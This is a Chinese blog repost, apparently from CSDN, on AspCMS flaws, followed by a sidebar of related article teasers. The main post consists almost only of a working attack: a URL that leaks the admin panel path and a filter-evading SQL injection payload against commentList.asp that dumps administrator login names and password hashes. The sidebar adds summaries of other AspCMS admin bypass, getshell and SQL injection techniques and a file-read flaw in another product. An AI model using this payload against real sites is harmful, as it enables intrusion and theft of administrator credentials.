aspcms逻辑错误导致后台地址泄露

最新推荐文章于 2024-04-02 10:41:25 发布
最新推荐文章于 2024-04-02 10:41:25 发布
阅读量1.9k 收藏 1
点赞数
原文链接:http://www.cnblogs.com/websecyw/p/10000400.html
版权

访问即可跳转后台地址:

URL:http://www.xxx.org.cn/plug/oem/AspCms_OEMFun.asp

注入:plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

 

转载于:https://www.cnblogs.com/websecyw/p/10000400.html

weixin_30835933
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
批量注入ASPCMS获得管理后台权限
08-25
批量注入ASPCMS获得管理后台权限,很好的东西
aspcms绕过进入后台
04-11
aspcms绕过进入后台
asp cms后台管理
11-03
1、1.5的模版是可以在2.0正式版中使用的,但是2.0正式版细分了很多功能页面,所以模版文件也增加了很多,所以如果单纯使用1.5版的模版,会造成缺少模版文件的错误。 2、1.5版暂时没有更好的办法升级到2.0,所以请大家不要盲目覆盖后台或做任何升级办法,由此产生的错误,官方也给不出答案。 3、鉴于以上情况,经我们仔细商量决定,我们会在近期,对1.5版本进行一次完善,做一个1.5的经典终极版本,解决前面一些错误。喜欢做简简单单企业站的,也可以继续使用前面1.5的版本,我们不定期也会制作1.5版本的模版。 4、测试版里的多语言,在这次正式版中,集合了,但是没有给出功能设置按钮,因为我们经过多次测试还是有操作上的不习惯,我们打算做成一个多语言的默认插件,需要的人就安装一下就可以了。 功能列表: 1、支持一键生成html; 2、支持google和百度地图生成; 3、RSS生成 4、URL自定义 5、增加按指定日期生成内容 6、自定义生成目录、文件名称 7、分类自定义模板、内容自定义模板 8、分类访问权限控制 9、一键切换模板 10、模板防盗功能 11、在线修改模板,CSS文件 12、采集功能 13、招聘应聘功能 14、TAG功能 15、批量添加分类功能 16、水印功能 17、留言,评论内容过滤功能 18、在线升级功能 19、事件邮件提醒功能 20、增加相册功能 21、自定义标签功能 22、广告位管理功能 23、浮动广告,对联广告,右下弹出广告 24、支持无限极分类; 25、支持自定义标题、自定义关键词、自定义描述; 26、支持栏目,分类是否启用开关; 27、支持外部跳转链接控制; 28、拥有留言板、友情链接,上传文件管理,数据库备份/恢复,在线客服,幻灯片等常用功能; 29、特有冗余文件检测功能,可以检测无用的上传文件并删除;
ASPCMS后台加载慢甚至崩溃问题的处理
weixin_30300523的博客
03-06 208
我们在使用ASPCMS程序的时候,在后台进入后,有时容易出现后台卡死、假死、甚至崩溃的现象,追根求源导致此问题的原因是因为后台里面有部分功能会远程链接官方的网站服务器,若碰到官方服务器不稳定或出问题的时候,整个后台就会被卡死,甚至崩溃的现象; 为了避免这样的问题,经过测试有效后,在这里给出解决问题的办法: 直接打开数据库#DATA.ASP文件(将ASP改成MDB),然后将AspCms_Menu里面...
aspcms后台地址
05-17
aspcms后台地址,秒杀老版本,修改后台地址一样能跳到真实地址
逻辑错误漏洞
F2444790591的博客
07-10 1788
逻辑错误漏洞是指由于程序逻辑不严谨式逻辑大复杂,导致一些逻辑分支不能够正常处理或处理错误。通俗地讲:一个系统的功能大多后,程序开发人员就难以思考全面,对某些地方可能有遗漏,或者未能正确处理,从而导致逻辑漏洞。逻辑漏洞也可以说是程序开发人员的思路错误、程序开发人员的逻辑存在漏洞。 逻辑错误漏洞是非常隐蔽的,它不像SOL注射、XSS跨站脚本、命令执行漏洞有鲜明的标识,自动化扫描器可以定义一系列的规则识别出这些漏洞,而逻辑漏洞一般出现在功能(业务流程)上,这是漏洞扫描工具无法识别的。逻辑漏洞的危害
aspcms后台拿shell漏洞(非添加模块)及修复方法
weixin_34122548的博客
11-10 2919
aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.1、进入后台,“扩展功能”--...
收集cms后台路径的方法
钞sir的博客
12-10 4738
你我是何生疏 偏于我身旁坐
记一次内网靶机实战
千寻的博客
11-05 1922
记一次内网靶机实战记录,1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用
aspcms后台美化删除版权信息等等
09-28
ASPCMS是一款常见的内容管理系统,它提供了丰富的功能和易用的后台管理界面。本文将针对如何美化ASPCMS后台、删除版权信息以及优化登录界面进行详细的步骤解析。 首先,我们来看如何美化后台主页。在ASPCMS系统中...
aspcms后台管理系统
08-02
aspcms后台系统,个人感觉比较好用。希望喜欢的朋友下载
功能强大的aspcms后台
08-14
在本文中,我们将深入探讨Aspcms后台系统的各项特性和使用方法,以帮助你更好地理解和利用这一工具。 1. **系统架构** Aspcms采用经典的B/S(Browser/Server)架构,用户只需通过浏览器即可进行后台管理,无需安装...
aspcms精美后台登录界面.rar
01-11
aspcms精美后台登录界面。 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设...
常见的CMS后台getshell姿势总结
记录学习,一起进步
03-21 1270
WordPress,dedecmsaspcms,南方数据企业系统,phpmyadmin日志,pageadmin,无忧企业系统等CMS进行getshell
【漏洞复现】AspCMS commentList.asp SQL注入
失心少年
09-14 1147
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。1.利用如下POC可获取管理员MD5的密码。
注入id列表_开源CMS实战渗透测试ASPCMS注入
weixin_39926613的博客
11-27 961
实验等级:中级任务场景:【任务场景】小王在对ASPCMS进行代码审计时,发现ASPCMS的API存在较大的安全问题。在查阅资料后,发现该CMS逻辑漏洞会导致SQL语句执行漏洞。任务分析:【任务分析】通过阅读源码,找到commentList.asp中的逻辑漏洞。使用处理过的SQL语句执行获取管理员信息,并对其密码进行MD5解密,最终实现盗取管理员账号密码的效果。预备知识:【预备知识】A...
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 587
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞。
fso 拒绝访问_错误号:-2147024891-ASPCMS问题解答
weixin_39876450的博客
12-18 1786
在做aspcms网站的时候出现这样一个问题错误号:-2147024891错误描述:006~ASP 0178~Server.CreateObject 访问错误~检查权限时,对 Server.CreateObject 的调用失败。拒绝对此对象的访问。这个不是程序的问题这个是服务器IIS上的问题,解决方法如下:一、权限不足右击网站所在文件夹--安全选项,加入everyone,internet来宾帐号(I...
1203GMT-VB一种N-Channel沟道DFN8(5X6)封装MOS管
最新发布
07-20
1203GMT-VB;Package:DFN8(5X6);Configuration:Single-N-Channel;VDS:30V;VGS:20(±V);Vth:1.7V;RDS(ON)=9mΩ@VGS=4.5V;RDS(ON)=7mΩ@VGS=10V;ID:80A;Technology:Trench;
pageadmin cms 2.x后台登陆绕过
09-29
想要回答关于pageadmin cms 2.x后台登录绕过的问题,我要先指出这是一种非法行为,违反了网络安全和法律法规。以下是一个合法途径来解决类似的问题。 在遇到后台登录登陆绕过的情况时,第一步是联系网站的管理员或开发者,向他们报告该漏洞。这样做是为了确保网站的安全性和数据的保护。通常情况下,网站管理员会非常重视这类问题,并且会及时采取措施来修复漏洞。 如果您是网站的管理员或开发者,并且已经意识到该漏洞存在,那么解决这个问题的方法可能会有所不同。您可以考虑以下几种方案: 1. 更新CMS:查看是否有关于漏洞的修复补丁或CMS的升级版本,按照官方的指引进行更新,以确保系统安全。升级CMS会修复许多已知的安全漏洞,并提供更多的安全功能。 2. 检查权限设置:确保只有授权用户才能访问后台登录页面,并且应对敏感操作进行限制。这意味着需要仔细检查CMS的权限设置,确保只有受信任的用户才能访问和管理网站。 3. 强化用户认证:采用更强大的用户认证方式,如双因素认证(Two-Factor Authentication,2FA)。这会增加攻击者突破认证的难度,提高系统的安全性。 4. 定期备份:确保定期进行网站数据的备份,并将备份存储在安全的地方。这样,在出现问题时可以快速恢复数据,并减少系统被黑客攻击所造成的损失。 5. 使用Web防火墙:可以考虑使用Web防火墙来监控和过滤进出网站的流量。这种安全工具可以检测和防止恶意请求,并提供实时保护。 总之,对于pageadmin cms 2.x后台登录绕过的问题,最重要的是积极主动地与网站管理员或开发者合作,并采取相应措施来保护网站的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值